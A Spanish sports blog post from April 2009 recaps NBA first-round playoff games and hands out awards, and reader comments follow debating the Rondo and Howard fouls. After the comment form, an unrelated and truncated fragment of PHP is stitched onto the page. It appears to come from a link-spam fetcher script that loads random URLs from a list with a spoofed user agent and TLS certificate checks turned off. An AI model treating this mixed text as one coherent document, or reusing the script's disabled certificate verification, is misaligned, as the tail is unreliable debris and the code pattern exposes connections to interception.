Playoffs (29/04/2009): Fin de trayecto

29 de April de 2009 por MagicJohnson32

spursend

Por Txusma y MagicJohnson32

Se acabó el viaje. Ha sido bonito, largo y fructífero, pero se ha acabado. Anoche, concretamente, los Spurs vivieron la última etapa y cerraron un ciclo con su eliminación en primera ronda ante los Mavericks. La ausencia de Manu Ginóbili puede suponer un motivo para relativizar este aparente final de ciclo: ¿cómo de competitivos habrían sido los Spurs de haber podido contar con el argentino? Pero harían bien los de Popovich en no seguir apurando la copa. Cuanto antes empieces a reconstruir, antes volverás a la cumbre.

Los Mavs, tal y como reconocieron Duncan y Popovich, han sido mejor equipo. Y eso que Nowitzki esperó al quinto partido para mostrar su mejor versión. Anoche al fin se destapó con 31 puntos (11 de 17 en tiros), 9 rebotes y 3 asistencias. Howard, tal vez el MVP de la serie, y Terry, demostrando de nuevo los méritos que le han valido el premio al mejor 6º hombre de la temporada, fueron los principales aliados del alemán. Los Spurs, para no variar, fueron Duncan, Parker y la nada.

ppierceclutchHemos empezado la crónica por la eliminación de los Spurs debido a lo que los texanos han supuesto durante la última década. Pero no nos engañemos: LA SERIE, así, con mayúsculas, de estos Playoffs está siendo el Celtics vs Bulls. De los cinco partidos disputados hasta ahora, cuantro se han decidido por 3 puntos o menos. El de anoche mantuvo la tónica, sólo que esta vez el héroe fue Pierce. Con Garnett lesionado y Ray Allen eliminado por faltas, no le quedó otra que ganar el partido a lo grande: forzó la prórroga con una canasta a 10 segundos para el final; en el tiempo suplementario, anotó otras tres veces en los últimos 76 segundos, la última de ellas a falta de 0:03. Brad Miller tuvo dos tiros libres para llevar el partido a una segunda prórroga pero no pudo con la presión y la victoria se quedó en Boston. Hay que destacar a Rondo, máximo anotador y asistente del partido y de nuevo al filo del triple doble con 28 puntos, 11 asistencias y 8 rebotes.

Los dos encuentros restantes ofrecieron victorias bastante previsibles de los equipos locales. Orlando se situó 3-2 en un partido que bien pudo cambiar de signo tras esta jugada:

Los árbitros no señalaron más que técnica (¿?) al pívot de los Magic y ahora habrá que ver si Stu Jackson tiene el valor de suspender a Howard para el sexto partido. El equipo local, pese al dominio del center (24 puntos y 24 rebotes) y el acierto anotador de Rashard Lewis (24 puntos, 9 de 16 en tiros) no acabó de romper el partido hasta el final ante unos Sixers en los que destacó Iguodala. Miller y Green aportaron pero Dalembert, Young y especialmente el banquillo fallaron estrepitosamente.

Por último, los Blazers forzaron el sexto partido ante los Rockets gracias a la defensa, que dejó a los de Houston en sólo 34 puntos en la segunda mitad. A Aldridge y Roy (25 puntos cada uno) se les unió esta vez Blake con 15 puntos, 7 rebotes y 3 asistencias. Rudy tuvo minutos (35) pero poco acierto, 2 de 7 en tiros, aunque aportó 7 puntos, 4 rebotes, 3 robos y 2 tapones. Para los Rockets, el mejor fue Scola con 10 de 13 en tiros y 21 puntos. La eliminatoria viaja a Houston, con un nuevo match-ball de los de Adelman que de ninguna manera han de permitir que la serie llegue al séptimo.

PREMIOS

MVP: Dudamos. Dudamos entre los 24 puntos y 24 rebotes de Dwight Howard (Dalembert aún le está buscando) y los 31 puntos (11 de 17) y 9 rebotes de Dirk Nowitzki. Se lo daremos al alemán por aparecer en el momento decisivo para finiquitar la eliminatoria.

Rookie: Jugando Derrick Rose, pocas oportunidades quedan para el resto a poco que lo haga mínimamente bien. 14 puntitos, 8 rebotes, 6 asistencias y 3 robos. Lástima de pérdidas (6).

Sorpresa: Sin considerar ya a Glen Davis como sorpresa, ojito a los 19 rebotes, 16 puntos y 7 tapones que se cascó ayer Kendrick Perkins frente a los Bulls. Dueño absoluto de la zona.

millerftmissDecepción: Los aficionados de los Bulls seguramente le perdonarán los 5 puntos y las 3 pérdidas del partido de ayer pero se acordarán durante bastante tiempo de los 2 tiros libres fallados al final del partido que dieron la victoria a los Celtics. Hablamos, cómo no, de Brad Miller.

El mayor esfuerzo en vano: 30 puntos, 8 rebotes y por primera vez en la calle en primera ronda desde el año 2000. ¿Qué hará con tanto tiempo libre Tim Duncan? ¿Se adaptará?

RAZONES PARA TRASNOCHAR

– Miami @ Atlanta (2.00h): Imposible mojarse por ninguno de los 2 equipos porque cada partido ha seguido un guión completamente diferente. De hecho, este partido podría marcar definitivamente el devenir de la eliminatoria y empujar hacia el éxito a uno de los dos equipos. Ojo con Wade.

– New Orleans @ Denver (4.30h): Poquitas ganas las que deben de tener Chris Paul y compañía de aparecer de nuevo sobre la cancha de un pabellón. Tan sólo un arrebato de vergüenza torera y un exceso de confianza por parte de los Nuggets les daría alguna oportunidad.

Comenta

21 comentarios a esta entrada

  1. dunc dice:
    #1

    mas increible que la canaste de pierce me parece el hecho de que dalembert no haya muerto despues de un codazo de howard…de hecho es que ni parecía conmocionado ni en el suelo ni nada…increible

      Citar

  2. TheDeerHunter dice:
    #2

    bueno… me parece increíble que sea yo quien entre a defender al “malage” de Brad Miller, pero estar centrado para un tiro libre decisivo después de que te hayan partido literalmente la boca no resulta nada fácil. Lo cierto es que en todo momento parecía bastante conmocionado por el golpe, que fue una hipoputada en toda regla.
    Si fuera yo a Rondo ya le valdría que le sancionaran para los próximos partidos porque iba a practicar la caza de hombrecillo volador. Y con la afición que tiene el chico de entrar a canasta como pollo sin cabeza que a nadie le extrañe si conoce el sabor del suelo durante los próximos partidos. Dientes por dientes… y ya que no hay justicia en la NBA pues… la justicia de los hombres.

    El partido fue precioso, por cierto… aunque a mí Rose me decepcionó un muchito.

      Citar

  3. elprincipiito dice:
    #3

    El partido lo echaron por la borda los bulls porque simplemente y llanamente no supieron mantener una diferencia de 9 cuando quedaban 7 minutos, pero lo del arbitraje de ayer fue de traca. Durante ese tiempo y en plena remontada verde no pitaron ninguna de las numerosas y claras faltas que recibio Rose al penetrar a canasta y como colofón la falta de Rondo a Miller es flagrante, antideportiva o como la quieran llamar pero ese tío estaba conmocionada y fijo que no veia el aro. Tal era el punto de su “inconsciencia” que va y tirando el segundo tiro libre a fallar no toca ni aro: multa para los arbitros y sancion para Rondo ya!! y que le pague el dentista a Brad.

    PD: El partido fue bonito para el que no vaya con ninguno de los dos, para mi fue agónico. Rose estuvo DECEPCIONANTE y Gordon individualista fallon. Grandísimo Noah y muy bien Hinrich. Go bulls!!

      Citar

  4. TheDeerHunter dice:
    #4

    En efecto… yo no iba con ninguno y me pareció bonito. (bueno… un poquito sí iba con los toricos)
    Si me lo preguntas diría que los Bulls jugaron los últimos minutos como un equipo pequeño. A cascarse triples y lo que caiga. Estuvieron a punto de ganar el partido por las mendrugueces de Tony Allen, pero no tenían forma humana de parar a los Rondo, los interiores Celtics (que no son precísamente Shaquille Oneal) ni mucho menos a Pierce, que estuvo magestático.
    No entiendo nada de porqué no utilizaron ni una sóla ayuda en ningún momento.

    Sobre el arbitraje, a excepción de la última jugada que considero del nivel del ostión de Bowen a Nash hace dos años, me pareció bastante típico.
    El problema fue Rose que se obtusó el solito. No sé que narices le pasó en unos instantes, donde podrían haber matado el partido. Se equivocó en todo y trató de redimirse obcecándose en penetraciones absurdas que sí, bien podrían haber pitado alguna falta de más, pero alguna también le pitaron que no era (como una que se tiró al suelo cuando no tenía salida por ningún lado) Creo sinceramente que fue más determinante su frustración que la actuación general de los árbitros… sin contar, como digo, de la flagrante como un piano a Miller. Una de las bestialidades más salvajes que he visto en la vida.
    Confío en que sancionen a Rondo. Si no que se atengan a las consecuencias.

      Citar

  5. kantonyo dice:
    #5

    Yo no coincido con Deer, en que el arbitraje fue típico,

    más bien creo que fue de los peores que he visto ultimamente, pitaron una falta bastante dudosa a favor de Rose cuando penetraba y segundos más tardes no le pitaron una a favor cuando recibió un manotazo tremendo, posiblemente cediendo a los pitos del Garden, luego no pitaron fuera cuando Ben Gordon piso la línea de banda antes de concederle falta con 3 tiros libres que igualarían el partido y que tambien podrían a ver sido decisivos. Sumando la flagrante clara que hizo Rondo sobre Miller cuando tenía una bandeja fácil para igualar a menos de 2″ y que decidió el partido. Todo eso en los minutos finales….

    Teniendo en cuenta que siempre he considerado que el arbitraje NBA es de los mejores en el deporte, me sorprendió mucho tantos errores en tan pocos minutos.

      Citar

  6. kantonyo dice:
    #6

    pd: pido disculpas por el ” a ver sido” ……………………… –> “haber sido”

      Citar

  7. Txusma dice:
    #7

    De acuerdo con la flagrante. Rondo va claramente a por el cuello de Miller olvidandose d cualquier otra cosa. Lo q no acabo de ver clara es la gravedad de la falta pq no he podido encontrar una imagen/video donde verlo claramente así que lo de la conmocion y tal… imposible de decidir.

      Citar

  8. Txusma dice:
    #8

    Encontre el video:
    http://www.youtube.com/watch?v=r6JpEx_CqOc

    Vaya castaña q le mete y claramente con toda la intencion de pararle como sea…

      Citar

  9. Viva_Dirk dice:
    #9

    Vaya puta suerte tienen los Celtics!!!!!!!!!!!!!!!!!!

    El partido coincido en que lo tiraron por la borda los Bulls, los Celtics no están haciendo mérito alguno para pasar la eliminatoria, pero un 80% de la inexperiencia de los bulls y un 20% de arbitros pueden conseguirlo.

      Citar

  10. elprincipiito dice:
    #10

    Si los Celtics pasan se la habran mericido totalmente. Rondo está jugando a un nivel increible, de allstar; Ray Allen sólo falló en el primer partido, en el resto está enchufado y ayer metió un triple clave; y Paul Pierce quizá había sido la decepción, pero fue el quien mandó el partido a la prorroga y anotó todos sus tiros en la OT: estuvo de MVP. Y ellos tres unidos a Davis y Perkins que estan jugando al 120% y en un campo como el garden de Boston que hace un ruido atronador resultan suficientes para ganar al mejor equipo de la NBA.

    Lo que pasa es que Chicago tenía a Boston tirado en el suelo y medio KO, y no creo que fuera por falta de experiencia pero lo que pasaron en los 7 ultimos minutos será posiblemente lo peor de Rose en la NBA: precipitación en pases arriesgados y no viendo buenos cortes de sus compañeros, pérdidas infantiles, penetraciones sin leer bien la defensa, en fin… que si esta eliminatoria no llega al séptimo será un completa injusticia por la intensidad que estan poniendo estos chicos.

      Citar

  11. Jabho dice:
    #11

    Tengo pendiente ver el partido de ayer, decir que el 80% inexperiencia y el 20% por ciento árbitros…. buff

    DEl resto de partidos poco que decir del arbitraje, y los Bulls se han llevado sus dos partidos tras prórrogas que podíamos haber ganado…. En fin, que está siendo una eliminatoria muy bonita y salvo el 3ª cada partido lo puede ganar cualquiera porque hay muchas alternativas. Del partido de ayer ya hablaré cuando lo vea.

    Una pena los Spurs pero se veía venir porque los Mavs acabaron muy fuertes la regular mientras que los Spurs al contrario.

    Curioso que hay más comentarios contra la decisión en el caso Rondo que por lo de Howard… jejeje 😉

      Citar

  12. Viva_Dirk dice:
    #12

    No se puede justificar que lo merezcan diciendo que Rondo esta jugando a un gran nivel y eso que dices de los jugadores, porque por Chicago esta Gordon haciendo cosas increibles, Rose muy bien y Noah dominando la zona.

    En relación calidad/merecimiento estan los Bulls muy por delante.

    Y Jabho, de los arbitros hablo solo del 5º partido eh, en los demás estuvieron bien.

      Citar

  13. xapa_croack dice:
    #13

    Pues howard con razon se merece la sancion de 1 partido de suspension, haber si tratan por igual a las demas estrellas.

      Citar

  14. Txusma dice:
    #14

    Pues si. No me hubiera jugado dinero a q sancionaban con un partido a Howard, lo q creo aboca la serie al septimo partido. Me sorprende más la no sanción a Rondo…
    Ah! De la serie Bulls-Celtics quiero destacar q no podemos olvidar q los Celtics juegan sin Kevin Garnett, autentica alma del equipo. A ellos tb hay aplaudirles. Para mi, cualquier vencedor sera merecido.

      Citar

  15. MagicJohnson32 dice:
    #15

    Creo que no hay comparación entre lo de Howard, un codazo claramente voluntario y sin el balón en juego, y lo de Rondo, que es una falta fea pero que no deja de ser parte de la acción. Tanto que dio la victoria a su equipo.

      Citar

  16. elprincipiito dice:
    #16

    Dirk, parto de que yo voy con los bulls y creo que se estan mereciendo pasar de ronda. Y te pregunto, si no me fijo en la actuación de los jugadores en que me tengo que basar para decidir si se lo merecen o no. Hablando de actuaciones increibles, Rondo=5, Gordon=1(y palmamos), Rose=1(y cero en defensa) y en cómputo general el rendimiento de Davis y Perkins superior al de Noah y Thomas. Los dos equips están jugando al 100% con las armas que tienen (con Garnett sería otra historia) y me sigue pareciendo que si Boston pasa lo habrá hecho con todas las de la ley.

      Citar

  17. MagicJohnson32 dice:
    #17

    A mí no me gusta hablar de “méritos” en el baloncesto. No acabo de entenderlo, no sé de qué hablamos para decir que un equipo mereció ganar.

    Me recuerda los lloros de los Kings cuando los Lakers se los cargaron en aquellas míticas Finales de Conferencia de 2001, jeje.

      Citar

  18. Txusma dice:
    #18

    Si no hubiera entrado el triple de Horry a lo mejor eran los de los Lakers los que habrian llorado hablando de meritos… 😀

      Citar

  19. MagicJohnson32 dice:
    #19

    No, qué va. Adelman decía que Shaq pisaba la línea en los tiros libres, Divac se quejaba por las faltas y en general los Kings mantuvieron un discurso sobre una supuesta superioridad ‘moral’, por así decirlo.

    El día del triple de Horry, estaban convencidos de que habían merecido ganar. ¿Por qué?

    Es como si los Blazers consuman su remontada en el 2000, acaban ganando el 7º, y yo digo que los Lakers merecían ganar porque se habían puesto 3-1 en la eliminatoria y estaban siendo muy superiores. ¿Y qué?

    Además, teniendo a Chris Webber ¿acaso pensaban que iban a ganar el anillo? :p)

      Citar

  20. Jabho dice:
    #20

    Hoy ya he visto el partido de ayer… nada que objetar a los árbitros. Que cualquiera repase el video y me diga en que jugadas claves se equivocaron. En los últimos minutos, en la prórroga o cuando quieran… como mucho en que lo de Rondo era flagrante o antideportva o como se diga y que hubiera dado un saque de banda con 2 segundos y poco más. Para jugadas dudosas la 4ª y la 5ª de Ray, y la 6ª directamente es bloqueo en movimiento de Brad Miller que es o falta suya o nada …

    Como Magic no veo comparación con lo de Howard

    En fin, que ayer los Celtics ganaron porque teníamos a Pierce.

    Esta noche a por otro partidazo 🙂

      Citar

  21. Jabho dice:
    #21

    Ah y como dice Txus en otro foro, lo de Brad Miller no es ni conmoción ni nada… tembleque y poco más

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>